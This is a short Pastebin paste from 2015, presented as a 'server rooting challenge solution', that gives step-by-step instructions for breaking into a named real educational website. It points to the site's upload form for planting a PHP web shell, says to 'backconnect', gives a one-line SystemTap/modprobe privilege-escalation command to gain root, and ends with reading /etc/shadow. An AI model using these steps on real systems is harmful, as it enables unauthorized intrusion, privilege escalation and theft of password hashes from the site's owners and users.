Advertisement
Kyfx

Server r00ting

Nov 4th, 2015
453
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.62 KB | None | 0 0
  1. Server Rooting Challenge Solution of Kashmiri Cheetah
  2.  
  3. Go to this site
  4. http://www.soc.edu.in/
  5.  
  6. Then Go to this Link for Shell uploading
  7. http://www.soc.edu.in/application.php
  8.  
  9. upload your php shell and then find your shell here
  10. http://www.soc.edu.in/upload/your_shell.php
  11.  
  12. then backconnect the server and run this commond (Systemtap) Systemtap is a method to root the server below version of 2011
  13.  
  14. printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u Rooted ^_^
  15.  
  16. copy above line and paste
  17.  
  18. W00t Server Rooted
  19.  
  20.  
  21.  
  22. print id should be root and print cat /etc/shadow
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement